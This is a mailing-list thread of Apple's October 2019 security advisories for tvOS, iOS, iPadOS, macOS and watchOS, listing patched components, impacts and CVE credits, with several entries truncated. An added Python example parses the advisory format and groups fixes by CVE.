[FD] APPLE-SA-2019-10-29-3 tvOS 13.2

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-3 tvOS 13.2

tvOS 13.2 is now available and addresses the following:

Accounts
Available for: Apple TV 4K and Apple TV HD
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt

App Store
Available for: Apple TV 4K and Apple TV HD
Impact: A local attacker may be able to log in to the account of a
previously logged in user without valid credentials.
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)

Audio
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

AVEVideoEncoder
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8795: 08Tc3wBB working with SSD Secure Disclosure

File System Events
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero
Day Initiative

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure

Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8786: an anonymous researcher

WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8813: an anonymous researcher

WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8782: Cheolung Lee of LINE+ Security Team
CVE-2019-8783: Cheolung Lee of LINE+ Graylab Security Team
CVE-2019-8808: found by OSS-Fuzz
CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8812: an anonymous researcher
CVE-2019-8814: Cheolung Lee of LINE+ Security Team
CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8819: Cheolung Lee of LINE+ Security Team
CVE-2019-8820: Samuel Groß of Google Project Zero
CVE-2019-8821: Sergei Glazunov of Google Project Zero
CVE-2019-8822: Sergei Glazunov of Google Project Zero
CVE-2019-8823: Sergei Glazunov of Google Project Zero

WebKit Process Model
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8815: Apple

Additional recognition

CFNetwork
We would like to acknowledge Lily Chen of Google for their
assistance.

Kernel
We would like to acknowledge Jann Horn of Google Project Zero for
their assistance.

WebKit
We would like to acknowledge Dlive of Tencent's Xuanwu Lab and Zhiyi
Zhang of Codesafe Team of Legendsec at Qi'anxin Group for their
assistance.

Installation note:

Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> System -> Software Update -> Update Software."

To check the current version of software, select
"Settings -> General -> About."

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
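The advisories in this thread all share one plain-text layout: a component name, then `Available for:`, `Impact:` and `Description:` fields wrapped at roughly 70 columns, then one `CVE-YYYY-NNNN: credit` line per fix and an optional `Entry added ...` note, up to the `Additional recognition` section. The parser below is an added example, not code from Apple or the Full Disclosure list; it runs over a constructed excerpt of the tvOS 13.2 entries above, and the `severity_bucket` label is my own triage heuristic derived from the Impact sentence, not an Apple or CVSS rating.

```python
"""Parser for the APPLE-SA plain-text advisory format (added example)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the tvOS 13.2 advisory, used as sample input.
SAMPLE = """\
APPLE-SA-2019-10-29-3 tvOS 13.2

tvOS 13.2 is now available and addresses the following:

Accounts
Available for: Apple TV 4K and Apple TV HD
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt

Audio
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

Additional recognition

CFNetwork
We would like to acknowledge Lily Chen of Google for their assistance.
"""

ADVISORY_RE = re.compile(r"APPLE-SA-\d{4}-\d{1,2}-\d{1,2}-\d+")
CVE_RE = re.compile(r"^(CVE-\d{4}-\d{4,7}):?\s*(.*)$")
FIELD_RE = re.compile(r"^(Available for|Impact|Description):\s*(.*)$")
FIELD_ATTR = {"Available for": "available_for", "Impact": "impact",
              "Description": "description"}


@dataclass
class Entry:
    component: str
    available_for: str = ""
    impact: str = ""
    description: str = ""
    cves: list = field(default_factory=list)   # [[cve_id, credit], ...]
    note: str = ""                              # "Entry added ..." line, if any


def _blocks(text):
    """Split the advisory into blank-line-separated paragraphs."""
    blocks, cur = [], []
    for line in text.splitlines():
        if line.strip():
            cur.append(line.rstrip())
        elif cur:
            blocks.append(cur)
            cur = []
    if cur:
        blocks.append(cur)
    return blocks


def parse_advisory(text):
    """Return (advisory_id, [Entry, ...]) for one APPLE-SA message.

    Any line that is not a field label, a CVE line or an 'Entry added' note
    is a wrapped continuation of the field that preceded it.
    """
    m = ADVISORY_RE.search(text)
    advisory_id = m.group(0) if m else None
    entries = []
    for block in _blocks(text):
        if block[0].strip() == "Additional recognition":
            break  # only credits follow; no more CVE entries
        if len(block) < 2 or not block[1].startswith("Available for:"):
            continue  # title line, intro sentence, etc.
        entry = Entry(component=block[0].strip())
        current = None  # attribute the next continuation line belongs to
        for line in block[1:]:
            cve = CVE_RE.match(line)
            fld = FIELD_RE.match(line)
            if cve:
                entry.cves.append([cve.group(1), cve.group(2).strip()])
                current = "cves"
            elif fld:
                current = FIELD_ATTR[fld.group(1)]
                setattr(entry, current, fld.group(2).strip())
            elif line.startswith(("Entry added", "Entry updated")):
                entry.note = line.strip()
                current = None
            elif current == "cves" and entry.cves:
                entry.cves[-1][1] = (entry.cves[-1][1] + " " + line.strip()).strip()
            elif current:
                setattr(entry, current, getattr(entry, current) + " " + line.strip())
        entries.append(entry)
    return advisory_id, entries


def severity_bucket(impact):
    """Coarse triage label from the Impact sentence (heuristic, not a rating)."""
    t = impact.lower()
    if "arbitrary code" in t or "code execution" in t:
        if "kernel privilege" in t:
            return "kernel-rce"
        if "system privilege" in t:
            return "system-rce"
        return "rce"
    if any(k in t for k in ("leak", "disclosure", "restricted memory", "memory layout")):
        return "info-leak"
    if "denial" in t:
        return "dos"
    return "other"


if __name__ == "__main__":
    adv_id, found = parse_advisory(SAMPLE)
    for e in found:
        for cve_id, credit in e.cves:
            print(f"{adv_id}\t{cve_id}\t{e.component}\t{severity_bucket(e.impact)}\t{credit}")
```

Feeding each message of this thread through `parse_advisory` and keying the result by CVE makes it easy to see that the same fix (for example CVE-2019-8787 or CVE-2019-8785) ships in the tvOS, watchOS and macOS advisories, which is the view a fleet owner needs to decide which platforms still need the update.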

[FD] APPLE-SA-2019-10-29-11 Additional information for APPLE-SA-2019-9-26-8 iOS 13.1 and iPadOS 13.1

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-11 Additional information
for APPLE-SA-2019-9-26-8 iOS 13.1 and iPadOS 13.1

iOS 13.1 and iPadOS 13.1 address the following:

AppleFirmwareUpdateKext
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8747: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Audio
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab
Entry added October 29, 2019

Books
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Parsing a maliciously crafted iBooks file may lead to a
persistent denial-of-service
Description: A resource exhaustion issue was addressed with improved
input validation.
CVE-2019-8774: Gertjan Franken of imec-DistriNet, KU Leuven
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8740: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A malicious application may be able to determine kernel
memory layout
Description: The issue was addressed with improved permissions logic.
CVE-2019-8780: Siguza

libxslt
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Multiple issues in libxslt
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8750: found by OSS-Fuzz
Entry added October 29, 2019

mDNSResponder
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: An attacker in physical proximity may be able to passively
observe device names in AWDL communications
Description: This issue was resolved by replacing device names with a
random identifier.
CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile
Networking Lab at Technische Universität Darmstadt
Entry added October 29, 2019

VoiceOver
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.
CVE-2019-8775: videosdebarraquito

WebKit
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Visiting a maliciously crafted website may reveal browsing
history
Description: An issue existed in the drawing of web page elements.
The issue was addressed with improved logic.
CVE-2019-8769: Piérre Reimertz (@reimertz)

WebKit
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4
and later, and iPod touch 7th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8710: found by OSS-Fuzz
CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin
Group
CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech
CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech
CVE-2019-8763: Sergei Glazunov of Google Project Zero
CVE-2019-8765: Samuel Groß of Google Project Zero
CVE-2019-8766: found by OSS-Fuzz
CVE-2019-8773: found by OSS-Fuzz

Additional recognition

boringssl
We would like to acknowledge Nimrod Aviram of Tel Aviv University,
Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr
University Bochum for their assistance.
Entry added October 29, 2019

Find My iPhone
We would like to acknowledge an anonymous researcher for their
assistance.

Identity Service
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.

Notes
We would like to acknowledge an anonymous researcher for their
assistance.


[FD] APPLE-SA-2019-10-29-2 macOS Catalina 10.15.1, Security Update 2019-001 Mojave, Security Update 2019-006 High Sierra

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-2 macOS Catalina 10.15.1, Security Update
2019-001 Mojave, Security Update 2019-006 High Sierra

macOS Catalina 10.15.1, Security Update 2019-001 Mojave,
Security Update 2019-006 High Sierra are now available and address
the following:

Accounts
Available for: macOS Catalina 10.15
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt

App Store
Available for: macOS Catalina 10.15
Impact: A local attacker may be able to log in to the account of a
previously logged in user without valid credentials.
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)

AppleGraphicsControl
Available for: macOS Catalina 10.15
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2019-8817: Arash Tohidi

AppleGraphicsControl
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8716: Zhiyi Zhang of Codesafe Team of Legendsec at Qi'anxin
Group, Zhuo Liang of Qihoo 360 Vulcan Team

Associated Domains
Available for: macOS Catalina 10.15
Impact: Improper URL processing may lead to data exfiltration
Description: An issue existed in the parsing of URLs. This issue was
addressed with improved input validation.
CVE-2019-8788: Juha Lindstedt of Pakastin, Mirko Tanania, Rauli
Rikama of Zero Keyboard Ltd

Audio
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab

Audio
Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

Books
Available for: macOS Catalina 10.15
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A validation issue existed in the handling of symlinks.
This issue was addressed with improved validation of symlinks.
CVE-2019-8789: Gertjan Franken of imec-DistriNet, KU Leuven

Contacts
Available for: macOS Catalina 10.15
Impact: Processing a maliciously crafted contact may lead to UI spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)

CUPS
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8736: Pawel Gocyla of ING Tech Poland (ingtechpoland.com)

CUPS
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: Processing a maliciously crafted string may lead to heap
corruption
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2019-8767: Stephen Zeisberg

CUPS
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: An attacker in a privileged position may be able to perform a
denial of service attack
Description: A denial of service issue was addressed with improved
validation.
CVE-2019-8737: Pawel Gocyla of ING Tech Poland (ingtechpoland.com)

File Quarantine
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: A malicious application may be able to elevate privileges
Description: This issue was addressed by removing the vulnerable
code.
CVE-2019-8509: CodeColorist of Ant-Financial LightYear Labs

File System Events
Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero
Day Initiative

Graphics
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6
Impact: Processing a malicious shader may result in unexpected
application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2018-12152: Piotr Bania of Cisco Talos
CVE-2018-12153: Piotr Bania of Cisco Talos
CVE-2018-12154: Piotr Bania of Cisco Talos

Graphics Driver
Available for: macOS 

[FD] APPLE-SA-2019-10-29-10 Additional information for APPLE-SA-2019-10-07-1 macOS Catalina 10.15

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-10 Additional information
for APPLE-SA-2019-10-07-1 macOS Catalina 10.15

macOS Catalina 10.15 addresses the following:

AMD
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8748: Lilang Wu and Moony Li of TrendMicro Mobile Security
Research Team

apache_mod_php
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Multiple issues in PHP
Description: Multiple issues were addressed by updating to PHP
version 7.3.8.
CVE-2019-11041
CVE-2019-11042

Audio
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab
Entry added October 29, 2019

Books
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Parsing a maliciously crafted iBooks file may lead to a
persistent denial-of-service
Description: A resource exhaustion issue was addressed with improved
input validation.
CVE-2019-8774: Gertjan Franken of imec-DistriNet, KU Leuven
Entry added October 29, 2019

CFNetwork
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019

CoreAudio
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative

CoreCrypto
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8741: Nicky Mouha of NIST
Entry added October 29, 2019

CoreMedia
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8825: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019

Crash Reporter
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: The "Share Mac Analytics" setting may not be disabled when a
user deselects the switch to share analytics
Description: A race condition existed when reading and writing user
preferences. This was addressed with improved state handling.
CVE-2019-8757: William Cerniuk of Core Development, LLC

CUPS
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8736: Pawel Gocyla of ING Tech Poland 

[FD] APPLE-SA-2019-10-29-4 watchOS 6.1

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-4 watchOS 6.1

watchOS 6.1 is now available and addresses the following:

Accounts
Available for: Apple Watch Series 1 and later
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at
Technische Universität Darmstadt

App Store
Available for: Apple Watch Series 1 and later
Impact: A local attacker may be able to log in to the account of a
previously logged in user without valid credentials.
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu)

AppleFirmwareUpdateKext
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8747: Mohamed Ghannam (@_simo36)

Audio
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8785: Ian Beer of Google Project Zero
CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure

Contacts
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted contact may lead to UI spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)

File System Events
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero
Day Initiative

Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure

Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8786: an anonymous researcher

libxslt
Available for: Apple Watch Series 1 and later
Impact: Multiple issues in libxslt
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8750: found by OSS-Fuzz

VoiceOver
Available for: Apple Watch Series 1 and later
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.
CVE-2019-8775: videosdebarraquito

WebKit
Available for: Apple Watch Series 1 and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8764: Sergei Glazunov of Google Project Zero

WebKit
Available for: Apple Watch Series 1 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin
Group
CVE-2019-8765: Samuel Groß of Google Project Zero
CVE-2019-8766: found by OSS-Fuzz
CVE-2019-8808: found by OSS-Fuzz
CVE-2019-8811: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8812: an anonymous researcher
CVE-2019-8816: Soyeon Park of SSLab at Georgia Tech
CVE-2019-8820: Samuel Groß of Google Project Zero

Additional recognition

boringssl
We would like to acknowledge Nimrod Aviram of Tel Aviv University,
Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr
University Bochum for their assistance.

CFNetwork
We would like to acknowledge Lily Chen of Google for their
assistance.

Kernel
We would like to acknowledge Jann Horn of Google Project Zero for
their assistance.

Safari
We would like to acknowledge Ron Summers for their assistance.

WebKit
We would like to acknowledge Zhiyi Zhang of Codesafe Team of
Legendsec at Qi'anxin Group for their assistance.

Installation note:

Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641

To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".

Alternatively, on your watch, select "My Watch > General > About".

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

[FD] APPLE-SA-2019-10-29-6 Additional information for APPLE-SA-2019-9-26-3 iOS 13

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-6 Additional information
for APPLE-SA-2019-9-26-3 iOS 13

iOS 13 addresses the following:

Bluetooth
Available for: iPhone 6s and later
Impact: Notification previews may show on Bluetooth accessories even
when previews are disabled
Description: A logic issue existed with the display of notification
previews. This issue was addressed with improved validation.
CVE-2019-8711: Arjang of MARK ANTHONY GROUP INC., Cemil Ozkebapci
(@cemilozkebapci) of Garanti BBVA, Oguzhan Meral of Deloitte
Consulting, Ömer Bozdoğan-Ramazan Atıl Anadolu Lisesi
Adana/TÜRKİYE

CFNetwork
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019

CoreAudio
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative

CoreCrypto
Available for: iPhone 6s and later
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8741: Nicky Mouha of NIST
Entry added October 29, 2019

CoreMedia
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8825: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019

Face ID
Available for: iPhone 6s and later
Impact: A 3D model constructed to look like the enrolled user may
authenticate via Face ID
Description: This issue was addressed by improving Face ID machine
learning models.
CVE-2019-8760: Wish Wu (吴潍浠 @wish_wu) of Ant-financial
Light-Year Security Lab

Foundation
Available for: iPhone 6s and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8641: Samuel Groß and Natalie Silvanovich of Google Project
Zero
CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Entry added October 29, 2019

IOUSBDeviceFamily
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8718: Joshua Hill and Sem Voigtländer
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8709: derrek (@derrekr6)
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8717: Jann Horn of Google Project Zero
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8712: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Kernel
Available for: iPhone 6s and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory corruption issue existed in the handling of
IPv6 packets. This issue was addressed with improved memory
management.
CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team
Entry added October 29, 2019

Keyboards
Available for: iPhone 6s and later
Impact: A local user may be able to leak sensitive user information
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC

libxml2
Available for: iPhone 6s and later
Impact: Multiple issues in libxml2
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8749: found by OSS-Fuzz
CVE-2019-8756: found by OSS-Fuzz
Entry added October 29, 2019

Messages
Available for: iPhone 6s and later
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.

[FD] APPLE-SA-2019-10-29-9 Additional information for APPLE-SA-2019-9-26-6 tvOS 13

2019-10-31 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-10-29-9 Additional information
for APPLE-SA-2019-9-26-6 tvOS 13

tvOS 13 addresses the following:

AppleFirmwareUpdateKext
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption vulnerability was addressed with
improved locking.
CVE-2019-8747: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019

Audio
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
